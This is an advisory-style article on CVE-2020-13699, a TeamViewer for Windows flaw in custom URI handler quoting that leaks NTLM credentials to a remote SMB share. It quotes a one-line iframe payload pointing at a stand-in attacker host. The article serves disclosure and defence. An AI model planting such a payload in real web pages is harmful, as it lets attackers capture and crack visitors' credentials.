A high-risk vulnerability was found in TeamViewer for Windows. It is tracked as “CVE-2020-13699“, with a CVSS base score of “8.8” that could be exploited by remote attackers to crack users’ password and thereupon, lead to the further system exploitation.
TeamViewer is a software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers developed by the German company TeamViewer GmbH. TeamViewer is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
A recent increase in the remote connectivity software application usage due to the recent COVID-19 Pandemic work from home culture shift.
(CVE-2020-13699) Vulnerability Details:
- CVE-2020-13699 is a security flaw that stems up from an unquoted search path or element. Specifically, this vulnerability is due to the application not correctly quoting its custom URI handlers.
- A user with an installed vulnerable TeamViewer version is tricked into visiting a maliciously crafted website to exploit this vulnerability.
- According to Jeffrey Hofmann, a security engineer with Praetorian, who discovered and disclosed the vulnerability “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.”
- Windows will perform NTLM authentication when opening the SMB share. That request can be relayed i.e., allows an attacker to capture an authentication and send it to another server, granting them the ability to perform operations on the remote server using the authenticated user’s privilege.
- Successful exploitation of this vulnerability could allow a remote attacker to launch TeamViewer with arbitrary parameters. The application could be forced to relay an NTLM authentication request to the attacker’s system enabling offline rainbow table attacks and brute force cracking attempts.
- These attacks could drive to additional exploitation due to stolen credentials from the successful exploitation of the vulnerability.
The disclosure suggested that there is no evidence of this vulnerability exploitation.
According to CIS, the risk of exploitation is high for government institutions and mid-size companies. In the case of small business entities, the risk is medium and low for home users.
The exploitation of the vulnerabilities could allow remote attackers to obtain sensitive credential information or take full control over the affected system.
TeamViewer Windows Desktop Application prior to 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
TeamViewer has published a security update addressing CVE-2020-13699.